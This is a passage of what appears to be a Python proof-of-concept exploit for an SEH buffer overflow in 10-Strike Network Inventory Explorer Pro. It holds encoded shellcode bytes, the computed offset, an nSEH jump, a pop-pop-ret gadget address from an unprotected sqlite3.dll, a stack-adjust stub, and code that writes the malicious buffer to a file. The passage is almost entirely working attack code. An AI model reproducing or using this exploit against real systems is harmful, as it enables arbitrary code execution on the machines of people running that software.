"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07" "\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85" "\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14" "\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8" "\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61" "\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1" "\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9" "\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87" "\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6" "\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e" "\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d" "\x51\x55\x3e\xf2\x52\x7c") #pattern_offset.rb -l 250 -q 41316841 offset = 213 #nasm > jmp short 8 nseh = "\xeb\x06\x90\x90" junk = "A" * (offset - len(nseh)) #0x61e012f6 : pop edi # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll) seh = struct.pack("<I", 0x61e012f6) #metasm > sub esp,0x10 subesp10="\x83\xec\x10" payload = shellcode buffer = junk + nseh + seh + subesp10 + payload f = open("overflow.txt", "w") f.write(buffer) f.close()